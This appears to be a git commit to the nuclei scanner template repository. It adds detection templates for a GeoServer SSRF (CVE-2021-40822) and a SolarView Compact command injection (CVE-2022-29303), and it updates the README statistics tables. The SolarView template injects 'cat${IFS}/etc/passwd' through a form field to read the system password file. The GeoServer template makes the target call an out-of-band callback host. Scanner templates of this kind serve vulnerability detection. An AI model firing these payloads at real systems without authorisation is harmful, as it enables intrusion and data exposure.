sullo 2022-05-18 16:56:31 -04:00
commit 64a691dbfa
10 changed files with 1665 additions and 1546 deletions

View File

@ -3,12 +3,14 @@ cves/2018/CVE-2018-17422.yaml
cves/2021/CVE-2021-20123.yaml cves/2021/CVE-2021-20123.yaml
cves/2021/CVE-2021-20124.yaml cves/2021/CVE-2021-20124.yaml
cves/2021/CVE-2021-25075.yaml cves/2021/CVE-2021-25075.yaml
cves/2021/CVE-2021-40822.yaml
cves/2021/CVE-2021-46379.yaml cves/2021/CVE-2021-46379.yaml
cves/2021/CVE-2021-46422.yaml cves/2021/CVE-2021-46422.yaml
cves/2021/CVE-2021-46424.yaml cves/2021/CVE-2021-46424.yaml
cves/2022/CVE-2022-1392.yaml cves/2022/CVE-2022-1392.yaml
cves/2022/CVE-2022-1598.yaml cves/2022/CVE-2022-1598.yaml
cves/2022/CVE-2022-21705.yaml cves/2022/CVE-2022-21705.yaml
cves/2022/CVE-2022-29303.yaml
cves/2022/CVE-2022-30489.yaml cves/2022/CVE-2022-30489.yaml
default-logins/octobercms-default-login.yaml default-logins/octobercms-default-login.yaml
exposed-panels/solarview-compact-panel.yaml exposed-panels/solarview-compact-panel.yaml
@ -17,5 +19,6 @@ misconfiguration/oracle-ebusiness-registration-enabled.yaml
misconfiguration/unauth-wavink-panel.yaml misconfiguration/unauth-wavink-panel.yaml
misconfiguration/xss-deprecated-header.yaml misconfiguration/xss-deprecated-header.yaml
technologies/kubernetes-operational-view-detect.yaml technologies/kubernetes-operational-view-detect.yaml
token-spray/api-chaos.yaml
vulnerabilities/wordpress/seo-redirection-xss.yaml vulnerabilities/wordpress/seo-redirection-xss.yaml
workflows/yonyou-nc-workflow.yaml workflows/yonyou-nc-workflow.yaml

View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1156 | daffainfo | 560 | cves | 1160 | info | 1192 | http | 3187 | | cve | 1168 | daffainfo | 564 | cves | 1172 | info | 1198 | http | 3209 |
| panel | 515 | dhiyaneshdk | 421 | exposed-panels | 523 | high | 874 | file | 68 | | panel | 517 | dhiyaneshdk | 423 | exposed-panels | 525 | high | 885 | file | 68 |
| lfi | 461 | pikpikcu | 316 | vulnerabilities | 452 | medium | 662 | network | 50 | | lfi | 464 | pikpikcu | 315 | vulnerabilities | 453 | medium | 667 | network | 50 |
| xss | 367 | pdteam | 262 | technologies | 255 | critical | 414 | dns | 17 | | xss | 371 | pdteam | 262 | technologies | 256 | critical | 415 | dns | 17 |
| wordpress | 364 | geeknik | 179 | exposures | 204 | low | 183 | | | | wordpress | 368 | geeknik | 179 | exposures | 204 | low | 182 | | |
| exposure | 293 | dwisiswant0 | 168 | misconfiguration | 197 | unknown | 6 | | | | rce | 296 | dwisiswant0 | 168 | misconfiguration | 200 | unknown | 6 | | |
| rce | 291 | princechaddha | 133 | workflows | 186 | | | | | | exposure | 294 | princechaddha | 137 | workflows | 187 | | | | |
| cve2021 | 283 | 0x_akoko | 130 | token-spray | 154 | | | | | | cve2021 | 289 | 0x_akoko | 134 | token-spray | 155 | | | | |
| tech | 271 | gy741 | 118 | default-logins | 95 | | | | | | tech | 272 | gy741 | 119 | default-logins | 96 | | | | |
| wp-plugin | 264 | pussycat0x | 116 | file | 68 | | | | | | wp-plugin | 268 | pussycat0x | 116 | file | 68 | | | | |
**261 directories, 3543 files**. **262 directories, 3566 files**.
</td> </td>
</tr> </tr>

File diff suppressed because one or more lines are too long

File diff suppressed because it is too large Load Diff

View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1156 | daffainfo | 560 | cves | 1160 | info | 1192 | http | 3187 | | cve | 1168 | daffainfo | 564 | cves | 1172 | info | 1198 | http | 3209 |
| panel | 515 | dhiyaneshdk | 421 | exposed-panels | 523 | high | 874 | file | 68 | | panel | 517 | dhiyaneshdk | 423 | exposed-panels | 525 | high | 885 | file | 68 |
| lfi | 461 | pikpikcu | 316 | vulnerabilities | 452 | medium | 662 | network | 50 | | lfi | 464 | pikpikcu | 315 | vulnerabilities | 453 | medium | 667 | network | 50 |
| xss | 367 | pdteam | 262 | technologies | 255 | critical | 414 | dns | 17 | | xss | 371 | pdteam | 262 | technologies | 256 | critical | 415 | dns | 17 |
| wordpress | 364 | geeknik | 179 | exposures | 204 | low | 183 | | | | wordpress | 368 | geeknik | 179 | exposures | 204 | low | 182 | | |
| exposure | 293 | dwisiswant0 | 168 | misconfiguration | 197 | unknown | 6 | | | | rce | 296 | dwisiswant0 | 168 | misconfiguration | 200 | unknown | 6 | | |
| rce | 291 | princechaddha | 133 | workflows | 186 | | | | | | exposure | 294 | princechaddha | 137 | workflows | 187 | | | | |
| cve2021 | 283 | 0x_akoko | 130 | token-spray | 154 | | | | | | cve2021 | 289 | 0x_akoko | 134 | token-spray | 155 | | | | |
| tech | 271 | gy741 | 118 | default-logins | 95 | | | | | | tech | 272 | gy741 | 119 | default-logins | 96 | | | | |
| wp-plugin | 264 | pussycat0x | 116 | file | 68 | | | | | | wp-plugin | 268 | pussycat0x | 116 | file | 68 | | | | |

View File

@ -0,0 +1,45 @@
id: CVE-2021-40822
info:
name: Geoserver - SSRF
author: For3stCo1d
severity: high
description: GeoServer through 2.18.5 and 2.19.x through 2.19.2 allows SSRF via the option for setting a proxy host.
reference:
- https://gccybermonks.com/posts/cve-2021-40822/
- https://github.com/geoserver/geoserver/compare/2.19.2...2.19.3
- https://nvd.nist.gov/vuln/detail/CVE-2021-40822
- https://github.com/geoserver/geoserver/releases
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-40822
cwe-id: CWE-918
metadata:
fofa-query: app="GeoServer"
verified: "true"
tags: cve2021,ssrf,geoserver,cve
requests:
- raw:
- |
POST /geoserver/TestWfsPost HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_hf_0=&url=http://{{interactsh-url}}/geoserver/../&body=&username=&password=
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: word
words:
- "<html><head></head><body>"
- type: status
status:
- 200

View File

@ -2,7 +2,7 @@ id: CVE-2021-46422
info: info:
name: SDT-CW3B1 1.1.0 - OS Command Injection name: SDT-CW3B1 1.1.0 - OS Command Injection
author: remote author: badboycxcc
severity: critical severity: critical
description: | description: |
Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication. Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.

View File

@ -0,0 +1,34 @@
id: CVE-2022-29303
info:
name: SolarView Compact 6.0 - OS Command Injection
author: badboycxcc
severity: high
description: |
SolarView Compact ver.6.00 was discovered to contain a command injection vulnerability via conf_mail.php.
reference:
- https://www.exploit-db.com/exploits/50940
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29303
- https://drive.google.com/drive/folders/1tGr-WExbpfvhRg31XCoaZOFLWyt3r60g?usp=sharing
metadata:
shodan-query: http.html:"SolarView Compact"
verified: "true"
tags: cve,cve2022,rce,injection
variables:
cmd: "cat${IFS}/etc/passwd"
requests:
- raw:
- |
POST /conf_mail.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
mail_address=%3B{{cmd}}%3B&button=%83%81%81%5B%83%8B%91%97%90M
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0"

View File

@ -16,7 +16,9 @@ headless:
name: extract name: extract
args: args:
code: | code: |
'\n' + [...new Set(Array.from(document.querySelectorAll('[src], [href], [url], [action]')).map(i => i.src || i.href || i.url || i.action))].join('\r\n') + '\n' () => {
return '\n' + [...new Set(Array.from(document.querySelectorAll('[src], [href], [url], [action]')).map(i => i.src || i.href || i.url || i.action))].join('\r\n') + '\n'
}
extractors: extractors:
- type: kval - type: kval
part: extract part: extract

View File

@ -0,0 +1,25 @@
id: api-chaos
info:
name: Chaos API Test
author: 0ri2N
severity: info
reference:
- https://chaos.projectdiscovery.io/#/docs
tags: dns,recon,chaos,token-spray,projectdiscovery
self-contained: true
requests:
- method: GET
path:
- "https://dns.projectdiscovery.io/dns/projectdiscovery.io"
headers:
Authorization: "{{token}}"
matchers:
- type: word
part: body
words:
- '"domain":'
- '"subdomains":'
condition: and